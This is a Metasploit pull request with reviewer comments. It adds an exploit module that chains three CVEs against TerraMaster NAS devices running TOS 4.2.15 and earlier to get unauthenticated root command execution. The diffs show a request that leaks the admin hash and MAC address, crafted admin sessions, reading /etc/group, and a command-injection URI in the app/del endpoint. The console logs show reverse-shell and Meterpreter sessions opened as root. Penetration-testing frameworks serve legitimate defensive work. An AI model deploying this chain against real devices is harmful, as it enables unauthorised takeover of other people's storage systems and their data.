### PR TITLE
TerraMaster unauthicated RCE a.k.a. TerrorMaster 2 [CVE-2021-45837]

### PR DESCRIPTION
**Pull request by h00die-gr3y**
This module provides a Terramaster chained exploit that performs session crafting to achieve escalated privileges that allows an attacker to access vulnerable code execution flaws. TOS versions `4.2.15` and below  are affected. 

CVE-2021-45839 is exploited to obtain the first administrator's hash set up on the system as well as other information such as MAC address, by performing a `POST` request to the `/module/api.php?mobile/webNasIPS` endpoint.
This information is used to craft an unauthenticated admin session using CVE-2021-45841 where an attacker can self-sign session cookies by knowing the target MAC address and the user password hash.
Guest users (disabled by default) can be abused using a null/empty hash and allow an unauthenticated attacker to login as guest which is used to download the `/etc/group` info to obtain the list of admin users, used to establish an unauthenticated admin session thru session crafting.

Finally, CVE-2021-45837 is exploited to execute arbitrary commands as root by sending a specifically crafted input to vulnerable endpoint `/tos/index.php?app/del`.

This module has been tested against a TerraMaster `F2-221` Model with the specifications listed below:
* TerraMaster F2-221
* CPU: `x86`
* TOS Version: `4.2.08`

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/terramaster_unauth_rce_cve_2021_45837`
- [ ] `set rhosts <ip-target>`
- [ ] `set rport <port>`
- [ ] `set target <0=Unix Command, 1=Linux Dropper>`
- [ ] `exploit`
- [ ] you should get a `reverse shell` or `Meterpreter` session depending on the `payload` and `target` settings

### Target 0 - Unix Command `cmd/unix/reverse_bash` session
```
msf6 exploit(linux/http/terramaster_unauth_rce_cve_2021_45837) > set target 0
target => 0
msf6 exploit(linux/http/terramaster_unauth_rce_cve_2021_45837) > exploit

[*] Started reverse TCP handler on 192.168.10.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. TOS version is 4.2.08 and CPU architecture is X64.
[*] Executing Unix Command for cmd/unix/reverse_bash
[*] Command shell session 1 opened (192.168.10.1:4444 -> 192.168.10.2:41822) at 2023-06-06 07:27:36 +0000

uname -a
Linux TerrorMaster 4.13.16 SMP Tue Jun 06 09:28:43 CET 2023 x86_64 GNU/Linux
id
uid=0(root) gid=0(root) groups=0(root)
```
### Target 1 - Linux Dropper `linux/x64/meterpreter/reverse_tcp` session
```
msf6 exploit(linux/http/terramaster_unauth_rce_cve_2021_45837) > set target 1
target => 1
msf6 exploit(linux/http/terramaster_unauth_rce_cve_2021_45837) > exploit

[*] Started reverse TCP handler on 192.168.10.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. TOS version is 4.2.08 and CPU architecture is X64.
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Sending stage (3045348 bytes) to 127.0.0.1
[*] Meterpreter session 2 opened (192.168.10.1:4444 -> 192.168.10.2:36938) at 2023-06-06 07:29:50 +0000
[*] Command Stager progress - 100.00% done (823/823 bytes)

meterpreter > sysinfo
Computer     : 192.168.10.2
OS           :  (Linux 4.13.16)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter >
```

### CODE REVIEW

File: documentation/modules/exploit/linux/http/terramaster_unauth_rce_cve_2021_45837.md [hunk 1]
```diff
@@ -0,0 +1,83 @@
+## Vulnerable Application
+
+This module provides a Terramaster chained exploit that performs session crafting to achieve escalated privileges
+that allows an attacker to access vulnerable code execution flaws. TOS versions `4.2.15` and below are affected.
```
Comment (jvoisin) [inline documentation/modules/exploit/linux/http/terramaster_unauth_rce_cve_2021_45837.md:4]: What is `TOS`?

File: modules/exploits/linux/http/terramaster_unauth_rce_cve_2021_45837.rb [hunk 2]
```diff
@@ -0,0 +1,287 @@
...
+    register_options([
+      OptString.new('TARGETURI', [true, 'Path to Terramaster Web console', '/'])
+    ])
+  end
+
+  def get_data
+    # Initialise instance variable data to store the leaked data
+    @data = {}
+
+    # Get the data by exploiting the LFI vulnerability thru vulnerable endpoint `api.php?mobile/webNasIPS`.
```
Comment (jvoisin) [inline modules/exploits/linux/http/terramaster_unauth_rce_cve_2021_45837.rb:97]:
```suggestion
    # Get the data by exploiting the LFI vulnerability through vulnerable endpoint `api.php?mobile/webNasIPS`.
```

File: modules/exploits/linux/http/terramaster_unauth_rce_cve_2021_45837.rb [hunk 3]
```diff
@@ -0,0 +1,287 @@
...
+        'User-Device' => 'TNAS'
+      }
+    })
+
+    if res && res.code == 200 && res.body.include?('webNasIPS successful')
+      # Parse the JSON response and get the data such as admin password hash and MAC address
+      res_json = res.get_json_document
+      unless res_json.blank?
+        @data['password'] = res_json['data'].split('PWD:')[1].split("\n")[0].strip
+        @data['mac'] = res_json['data'].split('mac":"')[1].split('"')[0].tr(':', '').strip
```
Comment (jvoisin) [inline modules/exploits/linux/http/terramaster_unauth_rce_cve_2021_45837.rb:113]: Are you parsing json by using `split`‽

File: modules/exploits/linux/http/terramaster_unauth_rce_cve_2021_45837.rb [hunk 4]
```diff
@@ -0,0 +1,287 @@
...
+        'Timestamp' => @data['timestamp']
+      },
+      'vars_post' => {
+        'path' => '/etc/group'
+      }
+    })
+    # get the admin users from /etc/group
+    if res && res.code == 200 && res.body.include?('admin')
+      res.body.each_line do |line|
+        field = line.split(':')
```
Comment (jvoisin) [inline modules/exploits/linux/http/terramaster_unauth_rce_cve_2021_45837.rb:153]: What if there is a blank line?

File: modules/exploits/linux/http/terramaster_unauth_rce_cve_2021_45837.rb [hunk 5]
```diff
@@ -0,0 +1,287 @@
...
+    # We will send two request per admin user. First request is a dummy request to obtain the session-id.
+    # This session-id will be used to send the second request that will execute the echo command with marker.
+    # if the response contains the marker, then the session has been successfully established.
+    # CVE-2021-45837
+    session = false
+    marker = Rex::Text.rand_text_alphanumeric(8..16)
+    for admin in @admin_users
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'tos', "index.php?app/del&id=0&name=;echo${IFS}#{marker};xx%23"),
```
Comment (jvoisin) [inline modules/exploits/linux/http/terramaster_unauth_rce_cve_2021_45837.rb:173]: Is the `xx` required?

File: documentation/modules/exploit/linux/http/terramaster_unauth_rce_cve_2021_45837.md (hunk 1 above)
Comment (h00die-gr3y) [reply documentation/modules/exploit/linux/http/terramaster_unauth_rce_cve_2021_45837.md:4]: TOS stands for TerraMaster Operating System (TOS). It is basically a "hardened Linux OS". I will spell it out in the document to make it more clear for the reader.

File: modules/exploits/linux/http/terramaster_unauth_rce_cve_2021_45837.rb (hunk 3 above)
Comment (h00die-gr3y) [reply modules/exploits/linux/http/terramaster_unauth_rce_cve_2021_45837.rb:113]: The response is JSON, but the data field where all this information is stored is a string that I cannot parse as JSON.

File: modules/exploits/linux/http/terramaster_unauth_rce_cve_2021_45837.rb (hunk 5 above)
Comment (h00die-gr3y) [reply modules/exploits/linux/http/terramaster_unauth_rce_cve_2021_45837.rb]: Nope. Removed from the payload. See https://github.com/rapid7/metasploit-framework/pull/18070/commits/46fcdb76d5f9da9f368e30692d86873bba97416a

File: modules/exploits/linux/http/terramaster_unauth_rce_cve_2021_45837.rb (hunk 2 above)
Comment (h00die-gr3y) [reply modules/exploits/linux/http/terramaster_unauth_rce_cve_2021_45837.rb]: See https://github.com/rapid7/metasploit-framework/pull/18070/commits/46fcdb76d5f9da9f368e30692d86873bba97416a

File: modules/exploits/linux/http/terramaster_unauth_rce_cve_2021_45837.rb (hunk 3 above)
Comment (jvoisin) [reply modules/exploits/linux/http/terramaster_unauth_rce_cve_2021_45837.rb:113]: Maybe use a regex than, like `/"mac":"([0-9a-f:]+)"` to make it a bit more clear what format is expected/parsed then.

**Review by jvoisin — APPROVED** [review]

File: modules/exploits/linux/http/terramaster_unauth_rce_cve_2021_45837.rb [hunk 6]
```diff
@@ -0,0 +1,289 @@
...
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'tos', "index.php?app/del&id=0&name=;#{payload};%23"),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'keep_cookies' => true,
+      'headers' => {
+        'User-Agent' => 'TNAS',
+        'User-Device' => 'TNAS',
+        'Authorization' => @data['password'],
+        'Signature' => @data['signature'],
+        'Timestamp' => @data['timestamp']
```
Comment (dwelch-r7) [inline modules/exploits/linux/http/terramaster_unauth_rce_cve_2021_45837.rb:253]: This headers section has been duplicated a few times could you extract out into it's own function?

File: modules/exploits/linux/http/terramaster_unauth_rce_cve_2021_45837.rb [hunk 7]
```diff
@@ -0,0 +1,289 @@
...
+            'Timestamp' => @data['timestamp']
+          }
+        })
+      end
+      next unless res && res.code == 200 && res.body.include?(marker.to_s)
+
+      session = true
+      break
+    end
+    return session
```
Comment (space-r7) [inline modules/exploits/linux/http/terramaster_unauth_rce_cve_2021_45837.rb:208]:
```suggestion
    session
```

**Review by space-r7 — COMMENTED** [review]
Thanks for the module! Just some stylistic suggestions here. Since we don't have access to a TerraMaster device, could you please send pcaps that show successful exploitation for both this PR and https://github.com/rapid7/metasploit-framework/pull/18063 to our mailing list, msfdev[at]metasploit.com? Thanks!

File: modules/exploits/linux/http/terramaster_unauth_rce_cve_2021_45837.rb (hunk 6 above)
Comment (h00die-gr3y) [reply modules/exploits/linux/http/terramaster_unauth_rce_cve_2021_45837.rb:253]: Hi @dwelch-r7, 
Can you explain a bit more? I am not entirely sure how to put headers in a function and call them from the send_cgi function.

Comment (space-r7) [reply modules/exploits/linux/http/terramaster_unauth_rce_cve_2021_45837.rb:253]: Maybe something like this?

```ruby
def get_headers
  {
     'User-Agent' => 'TNAS',
     'User-Device' => 'TNAS',
     'Authorization' => @data['password'],
     'Signature' => @data['signature'],
     'Timestamp' => @data['timestamp']
  }
end
```

And then for every request that uses these specific headers, just do this:

```ruby
send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'tos', "index.php?app/del&id=0&name=;#{payload};%23"),
      'ctype' => 'application/x-www-form-urlencoded',
      'keep_cookies' => true,
      'headers' => get_headers
})
```

Comment (h00die-gr3y) [reply modules/exploits/linux/http/terramaster_unauth_rce_cve_2021_45837.rb:253]: Cool. Learned something new today ;-)

File: modules/exploits/linux/http/terramaster_unauth_rce_cve_2021_45837.rb [hunk 8]
```diff
@@ -0,0 +1,289 @@
...
+
+  def check
+    get_terramaster_info
+    return CheckCode::Safe if @terramaster.empty?
+
+    if Rex::Version.new(@terramaster['tos_version']) <= Rex::Version.new('4.2.15')
+      return CheckCode::Vulnerable("TOS version is #{@terramaster['tos_version']} and CPU architecture is #{@terramaster['cpu_arch']}.")
+    else
+      return CheckCode::Safe("TOS version is #{@terramaster['tos_version']} and CPU architecture is #{@terramaster['cpu_arch']}.")
+    end
```
[the remark this answers is not in the document]
Comment (h00die-gr3y) [reply modules/exploits/linux/http/terramaster_unauth_rce_cve_2021_45837.rb]: see https://github.com/rapid7/metasploit-framework/pull/18070/commits/dfc366e022ffa438da15bc817b965268d092e6bb

File: modules/exploits/linux/http/terramaster_unauth_rce_cve_2021_45837.rb (hunk 7 above)
Comment (h00die-gr3y) [reply modules/exploits/linux/http/terramaster_unauth_rce_cve_2021_45837.rb]: See https://github.com/rapid7/metasploit-framework/pull/18070/commits/dfc366e022ffa438da15bc817b965268d092e6bb

File: modules/exploits/linux/http/terramaster_unauth_rce_cve_2021_45837.rb [hunk 9]
```diff
@@ -0,0 +1,289 @@
...
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'TerraMaster TOS 4.2.15 or lower - RCE chain from unauthenticated to root via session crafting.',
+        'Description' => %q{
+          Terramaster chained exploit that performs session crafting to achieve escalated privileges that allows
+          an attacker to access vulnerable code execution flaws. TOS versions 4.2.15 and below  are affected.
```
[the remark this answers is not in the document]
Comment (h00die-gr3y) [reply modules/exploits/linux/http/terramaster_unauth_rce_cve_2021_45837.rb]: See https://github.com/rapid7/metasploit-framework/pull/18070/commits/dfc366e022ffa438da15bc817b965268d092e6bb

File: modules/exploits/linux/http/terramaster_unauth_rce_cve_2021_45837.rb (hunk 6 above)
Comment (h00die-gr3y) [reply modules/exploits/linux/http/terramaster_unauth_rce_cve_2021_45837.rb]: See https://github.com/rapid7/metasploit-framework/pull/18070/commits/dfc366e022ffa438da15bc817b965268d092e6bb

**Comment by space-r7** [comment]
Confirmed the pcaps for this one. Will get this landed soon! Thanks!

**Comment by space-r7** [comment]
This exploits a series of vulnerabilities including session crafting and command injection in TerraMaster NAS versions `4.2.15` and below to achieve unauthenticated RCE as the `root` user.

**Pull request merged**